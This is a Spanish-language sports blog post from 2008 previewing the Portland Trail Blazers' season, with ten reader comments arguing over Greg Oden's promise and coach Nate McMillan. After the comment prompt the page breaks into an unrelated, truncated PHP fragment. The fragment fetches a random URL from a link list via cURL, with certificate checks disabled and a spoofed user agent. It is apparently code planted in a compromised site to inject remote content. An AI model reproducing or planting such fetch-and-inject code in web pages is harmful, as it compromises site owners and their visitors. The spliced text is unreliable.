Portland Trail Blazers: el cielo es el límite

17 de October de 2008 por Gallis

En el análisis de New Orleans Hornets preguntábamos al lector si era capaz de encontrar una franquicia con mejor expectativa a corto o medio plazo que ellos. Si ampliamos la pregunta al largo plazo quizá más de uno respondería, sin necesidad de pensarlo mucho, Portland Trail Blazers. Los de Oregon son ahora mismo la mezcla de juventud y talento más explosiva de la liga y parece poco probable que el resultado no sea exitoso. Antes de desgranar las razones del optímismo que se vive en Portland, es obligado hacer mención al artífice de todo esto: Kevin Pritchard. EL ex jugador del Club Baloncesto Cáceres se encontró con unos JailBlazers en estado de descomposición, incapaces de pasar de primera ronda desde la fatídica final del oeste de 2000 ni de pisar los Playoffs desde 2003, con jugadores claramente devaluados, de los que se hablaba tanto de sus hazañas deportivas como sus problemas legales (drogas, peleas de perros, enfrentamientos entre ellos)…en definitiva, un ambiente acorde al clima gris y lluvioso de la ciudad. Pues bien, en apenas 4 años Pritchard no ha cambiado del todo el rumbo deportivo, ya que el equipo se quedó fuera de la postemporada el año pasado, pero a base de grandes operaciones y no peores elecciones en el draft, ha conseguido devolver la ilusión a un equipo acostumbrado a jugar, al menos, hasta finales de mayo.

Brandon Roy se ha convertido, por derecho propio, en el líder de este equipo. Sin embargo, es otro el nombre que atormenta e ilusiona, a partes iguales, en Portland: Greg Oden. El número 1 del draft del pasado año era, sin duda, el hombre más esperado desde la irrupción de Lebron James en la liga. Pero antes de comenzar incluso la pretemporada llegaba la bomba. Su rodilla derecha dijo basta y el pívot debía perderse toda la temporada. Sin duda un jarro de agua fría para un equipo que confiaba en Oden como pilar principal de su crecimiento. Ahora, equipo y afición han viajado en el tiempo y están donde estaban el año pasado, emocionados con la posibilidad de contar con Oden. Y de momento las sensaciones son buenas. En su debut en pretemporada frente a los Kings, Oden disputó casi 20 minutos, firmando 13 puntos, 5 rebotes y 2 tapones y, lo mejor de todo, dando la sensación de estar recuperado. Sin embargo, el miedo a un recaída está demasiado presente (más todavía en una lesión de rodilla) y al menos esta temporada, será la gran sombra que empañe la trayectoria del equipo.

Pero Oden aparte decíamos, y repetimos, que el líder natural del equipo es Brandon Roy. Tras apuntar maneras, pese a sus problemas físicos, en su primera temporada en la liga, el ex jugador de la universidad de Washington confirmó las previsiones más optimistas sobre su figura. El jugador se echó al equipo a sus espaldas e hizo que todo el mundo se olvidara de Oden. Hasta febrero (diría más, hasta la racha de 22 triunfos seguidos de Houston) fue el equipo de moda. Nadie contaba con ellos y fueron, mientras les duro la gasolina, equipo de Playoff. Pero el oeste era todavía demasiado salvaje para ellos. Aún así, la temporada de Roy fue magnífica; Más de 19 puntos por partido, 4.7 rebotes, casi 6 asistencias y 1.1 robos de balón. Además, ha demostrado que es capaz de mejorar a sus compañeros y que no ha tocado techo.

Por su fuera poco pensar hasta donde pueden llegar los Blazers si la pareja Roy-Oden funcionara, un tercer nombre debe añadirse a la ecuación: LaMarcus Aldrigde. En una de esas grandes operaciones de Pritchard a las que antes hacíamos referencia, Portland conseguía el número 2 del draft y se hacía con los servicios de Aldridge, un jugador que despertaba serias dudas, disipadas en menos de 2 años. Al igual que Gasol en los Lakers, LaMarcus se vió obligado a jugar muchos minutos de 5 por la lesión de Oden y cumplió con creces. Casi 18 puntos y 7.6 rebotes. Pero más allá de los números, Aldridge dejó, en todos los campos de la liga la sensación de ser un jugador con mucho talento y más clase. Salvando las distancias, un más que posible digno sucesor de Chris Webber, no por estilo de juego, sino por la elegancia en el mismo. Y lo mejor es que, si las lesiones respetan a ambos, este año ocupará su posición natural, Power Forward, y lo hará con Oden a su lado. Una pareja que, si cuaja, puede hacer historia.

El resto del quinteto lo completarán, en principio, Steve Blake, un base cumplidor que tiene muy claro su papel, defender y amenazar desde la línea de 3 puntos y Martell Webster, quizá el joven proyecto del equipo que menos ha progresado. Sin embargo, el alero se lesionó en un pie en el partido de debut de pretemporada y se perderá los 2 primeros meses de competición. Viendo lo que hay por detrás en el banquillo, cuando vuelva necesitará algo más que galones para regresar al quinteto titular. El mayor problema para la química del equipo puede ser Travis Outlaw. Elegido en el número 23 del draft de Lebron, Outlaw no ha parado de progresar y pese a no ser titular, es una pieza básica en el engranaje de Nate McMillan. Además, ha demostrado ser uno de los mejores jugadores clutch de la liga. Sin embargo, esa progresión tiene un precio. El jugador quiere ser titular y quizá lo sea mientras falte Webster. Si tras su recuperación vuelve al banquillo, quizá sea uno de los jugadores que se muevan de equipo antes de febrero.

Si fueran pocos los atractivos de estos nuevos Blazers, en España hay que sumar la presencia de Sergio Rodríguez y Rudy Fernández. El base canario afronta su tercera temporada a los órdenes de Nate McMillan y pese a su ostracismo en sus 2 primeros años, el jugador la afronta con esperanzas renovadas y más ganas que nunca. Sergio está disputando casi 30 minutos por partido esta pretemporada y está respondiendo: 9 puntos y 8 asistencias. Desde luego no lo tendrá fácil, pero quién sabe si este será su año. Mejores expectativas parece tener Rudy. Su llegada a Oregon ha despertado casi tanto interés como el regreso de Oden. Además, su grandísima actuación en los Juegos Olímpicos ha terminado de enamorar a McMillan, ayundante de Coach K en el equipo olímpico americano. Su in your face a Dwigth Howard es una carta de presentación inmejorable. La baja de Webster ayudará a que tenga minutos al comienzo y a partir de ahí, todo dependerá de él, por lo que parece probable que se haga un nombre en la liga.

El encargado de dirigir este ilusionante proyecto será, un año más, Nate McMillan. Pese a la controversia creada por la rigidez de sus rotaciones y, para que negarlo, por la situación de Sergio (esta polémica, lógicamente, de consumo interno), el ex jugador de los Sonics es un entrenador de garantias. Desde que cogió el equipo no ha parado de progresar y ahora, con los mimbres que tiene, está ante la gran oportunidad de su vida. Para ello, aparte de los ya mencionados, aún le quedarán armas en el banquillo. Quizá el puesto más débil del equipo sea el de base (que nadie descarte que Roy juegue muchos minutos en esa posición). Por eso Pritchard volvió a lanzar sus redes en el draft y mejoró en 2 posiciones su elección para hacerse con Jerryd Bayless. Vistos los precedentes, cuesta pensar que sea una mala elección. Además, Nicolas Batum, ke Diogu, Luke Jackson, Channing Frye, Raef Lafrenz y Joel Prizbilla otorgan a los Blazers una profundidad de banquillo que para sí quisieran algunos de los candidatos al anillo. Desde luego ese objetivo queda todavía muy lejos para Portland, pero desde luego, muy mal se tienen que dar las cosas para que no se conviertan en uno de los outsiders de la liga.

Quinteto inicial: Steve Blake, Brandon Roy, Martell Webster(Travis Outlaw), LaMarcus Aldridge, Greg Oden

Sexto hombre: Travis Outlaw(Rudy Fernández)

Pronóstico: Primera ronda de Playoff

Comenta

10 comentarios a esta entrada

  1. univerzee dice:
    #1

    Chapeau!!! Hasta que llegaste a McM. Un entrenador mediocre, para mi. Existe la polemica de consumo interno que comentas, y aún obviandola para mi mediocre. Es cierto que ha mejorado cada año. 21, 32, 41 victorias. Pero como has dicho al principio ese merito en la mejoria es, para mi, de KPritchard, que año tras año le ha mejorado el equipo, más que esas más menos 10 victorias que el ha ido mejorando. Como decias hasta que llego HOU con su racha tenian un juego, digamos alegre, el el momento que se torcieron las cosas salío el alma amarrategui de McM y se dedico a jugar con y para Roy, sólo. Un juego monotono y aburrido al estilo “pasale a Roy”, y como tu indicas se esta pensando colocar a Roy de base, podrá este chico aguantar subir la pelota, aclarar el centro, penetrar, tirar, asistir y… bajar a defender?
    Por el resto encantado con tu analisis, lo comparto, y Aldridge me tiene enamorado. Saludos!!

      Citar

  2. TheDeerHunter dice:
    #2

    De McMillan empezaremos a formarnos una opinión real a partir de ahora, que es cuando se va a ver obligado a demostrar cosas. Hasta este punto pocas cosas se le han exigido con lo que lo tenía más o menos fácil. Podemos decir que más o menos ha dirigido el equipo correctamente aunque con cierta tendecia a ser “catenacciero”. Eso sí, como miembro del cuerpo técnico del “Redeem Team” qué queréis que os diga… muy pobre.
    Con respecto a Sergio a muchos nos encantaría que jugara más pero en nuestro foro interno todos sabemos que llegó a la liga bastante verde… e incluso ahora mismo hay poca gente que pida incluso que entre en la selección, con lo cual… Por lo que parece el chaval le ha echado este verano unas pelotas impresionantes y tiene la posibilidad de hacerse un hueco este año. Ójala lo logre.

    Como decía, la buena pinta de este equipo es evidente y el trabajo del GM sobresaliente… pero creo que habría que ser más cautos con este equipo. Se ha caído en una euforia que no la entiendo. Muchos los dan como el seguro equipo a batir a partir de dos, tres años… Para serlo, el factor clave es Oden… si es la mitad de bueno de lo que algunos aseguran.
    De momento yo lo que he visto es a un jambo con tendencia a ponerse como un ceporro y con antecedentes físicos muy problemáticos. Una combinación peligrosa suficiente como para de momento ponerlo en cuarentena. No olvidemos que no ha jugado ni un minuto en la liga.
    Sin saber si se trata del gran pívot que se espera el equipo está bien pero no tiene la proyección que se dice que tiene… y no olvidemos que de momento el gran grueso de la plantilla cobra una miseria y por eso precísamente se pueden permitir tener el arsenal de jovenes que tienen ahora… las renovaciones serán la otra clave para valorar la super-expectativa que han generado. Todos sabemos que, por mucha pasta que se deje el amigo Paul Allen, a todos no los van a poder mantener en estos 2-3 años vista. De las decisiones que se tomen en poco tiempo depende que sea un futuro candidato al anillo. De momento veremos si se clasifican para playoffs. Ni siquiera tienen eso seguro, ni mucho menos.

      Citar

  3. Viva_Dirk dice:
    #3

    Que solo hallas visto de Oden a ‘un jambo con tendencia a ponerse como un ceporro y con antecedentes físicos muy problemáticos’ me hace pensar si realmente le has visto a el o a otro tio. De lo primero necesito una explicación, no se como sabes que tiene tendencia a engordar. Y sobre las lesiones, hay jugadores que si han llegado a la liga con antecedentes de lesiones, como Okafor o May, pero que alguien tenga una(una sola) lesión de rodilla no le convierte en propenso a lesionarse, menos aun si esta recuperandose de esa lesión 4 meses mas de lo que es necesario.

    Yo lo que he visto de Oden es un pivot enorme que se mueve como si pesase 20 kilos menos de los que pesa, coordinado y que ha mejorado su tiro durante este año parado. Vamos que lo tiene todo.

    En cuanto a retener gente, todo dependerá del rendimiento deportivo, si el verano que viene pescan algun All-Star o varios buenos jugadores y se convierten en aspirantes, Allen no tendrá problemas es pagarles el máximo a Roy y Aldridge.

    Desde luego que pueden fracasar, como puede hacerlo cualquiera, pero tienen tantísimos jugadores de calidad, jóvenes y con posibilidades, que lo normal es que triunfen.

      Citar

  4. Jabho dice:
    #4

    joder, han levantado expectativas porque si hay un equipo que pueda convertirse en dinastía NBA son los Blazers. Dependerá básicamente de Oden que opten a ganar algún anillo o que opten a marcar una época de la historia de este deporte.

    Depende de Oden porque el resto ya está mas o menos. Roy es un All Star y aun sin Oden tiene pinta de jugador de llevar a su equipo al siguiente nivel Aldrige es muy bueno y de todos los jóvenes (Rudy, OutLaw, Webster, Bayless, Frye) unos haran una carrera y otros otra, pero dudo que alguno salga pufo total. Si se consolida el trio Oden – Aldrige – Roy no necesitas mas estrellas. Si salen bien, pero no seran imprescindibles.

    Sobre McMillan creo que es un buen entrenador. Bastante bueno de hecho. Como dice Deer a partir de ahora veremos cuanto bueno es, pero yo me hincho a ver entrenadores que no saben sacar partido de sus jugadores ni enseñar a los jóvenes. El hecho de que casi todos los jugadores de Porland progresen año a año habla en su favor. y de que tipos como Blake o Pryzbilla sean útiles y hagan su trabajo.

    Su problema en España es Sergio Rodriguez. Y aún con él creo que ha acertado. Sergio estaba verde, muy verde. y le ha obligado a trabajar y a mejorar…

    Por cierto yo a Oden le veo como Viva una pinta estupenda. Entiendo que no ha debutado aún, pero apunta muy buenas maneras….

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    A mi McMillan me parece un cabezacuadrada del 15, aunque tiene pinta de ser buen maestro/motivador.

      Citar

  6. TheDeerHunter dice:
    #6

    No estoy diciendo que Oden sea un mal jugador… para mí, como siempre dice Magic, es como un melón que habrá que abrir para ver si es bueno o malo. Efectivamente, si sale la mitad de bueno de lo que dicen de él será difícil tumbar a Portland en 2-3 años.
    Yo no le he visto jugar más allá de algunas highlights de esta pretemporada… me viene a la cabeza ahora la que le vi contra los Kings que se supone ha sido su mejor partido hasta la fecha. Le vi un animal, pero su coordinación y rapidez no me dejaron con el culo torcido ni mucho menos… se dedicó a abusar físicamente de los pívots blanquitos de Sacramento y a colgarse del aro. No vi al bailarín de claquet precísamente… De hecho lo que me intriga es lo que dices de la mejora del tiro… no recuerdo haberle visto tirar más lejos de a unos 20cm del aro en toda la pretemporada…

    Lo de que tiene tendencia a coger kilos??? no hay más que verlo del año pasado a éste, con lo joven que es. ¿en cuanto debe de estar ahora??? menudo mostrenco.
    Y las lesiones de rodilla, como todas las lesiones en las articulaciones tienen un problema. Por muy bien que te las cures dejan la zona vulnerable y la probabilidad de sufrir otra lesión de ese estilo crece exponencialmente, más aún en jugadores de ese tamaño y peso.
    No tiene porqué pasarle, pero digamos que él es un jugador más expuesto a ese problema que la gran mayoría.

      Citar

  7. Viva_Dirk dice:
    #7

    Yo vi jugar a Oden con Ohio State y es evidente que este año pesa mas, pero no precisamente porque halla engordado, sino porque esta mas fuerte, y eso sin perder velocidad. En cuanto a la coordinación, nadie ha hablado de grandes movimientos al poste, la gran mayoría de los mejores pivots de la historia no los tenían y de los de ahora, ya me contarás lo movimientos que tienen Dwight Howard o Carlos Boozer.

    Para acabar lo del tiro, ha jugado 4 partidos de preseason y no se le ha podido ver, de esto, hablo solo de oidas.

      Citar

  8. telekoman dice:
    #8

    Hombre, si le pedimos a Oden movimientos de Claqué es que claramente hemos perdido un poco el Norte. El tío es un pivot de fuerza, no de sutileza. Realmente el único pivot capaz de hacer movimientos de ese tipo ha sido Olajuwon. Pero yo estoy con Deer en que a mi me genera dudas Oden. Y no tengo ningún motivo objetivo ya que no le he visto jugar, pero me genera dudas.

      Citar

  9. TheDeerHunter dice:
    #9

    Yo no entro ahora en si Oden debería tener un repertorio de movimientos o no lo debería tener, o si tiene buen tiro o no… sólo he dicho que yo no se lo he visto… más que nada porque… NO le he visto.
    Sólo entro en los hechos, que no dan para pensar que será el nuevo Shaquille Oneal como más de uno cree (y no lo digo por nadie, que os veo venir) O puede que lo sea!!! aunque para decirlo sugiero que al menos esperemos para verlo como mínimo UN SÓLO PARTIDO.

    Jugar en Ohio State está muy bien y no dudo del ojo clínico de Viva en cuanto a prometedores jugadores se refiere… Pero es que se están hablando de cosas muy serias de él… de que va a dominar la NBA (junto a sus compañeros) durante los próximos años. Ni más ni menos.
    Exáctamente lo mismo que se decía de Orlando cuando llegó a aquella final contra Houston. La próxima gran dinastía… y el caso es que también parecía que lo podían ser. Es sólo un ejemplo de muchos.

    En realidad sólo estoy pidiendo un poco prudencia… nada más. Estoy casi seguro que Portland va a dar guerra los próximos años… pero eso sí, me lo creeré cuando lo vea.

      Citar

  10. MagicJohnson32 dice:
    #10

    No sé muy bien qué pensar sobre McMillan. Sí que parece que le puede sacar mucho partido a la plantilla pero estoy con UNIVERZEE en lo que comenta de que el año pasado hubo muchos partidos durante el segundo tramo de temporada en los que jugaron con una enorme pobreza táctica.

    Pero vamos, que el proyecto tiene una pinta que asusta. Ojalá Sergio & Rudy puedan formar una parte importante de él.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>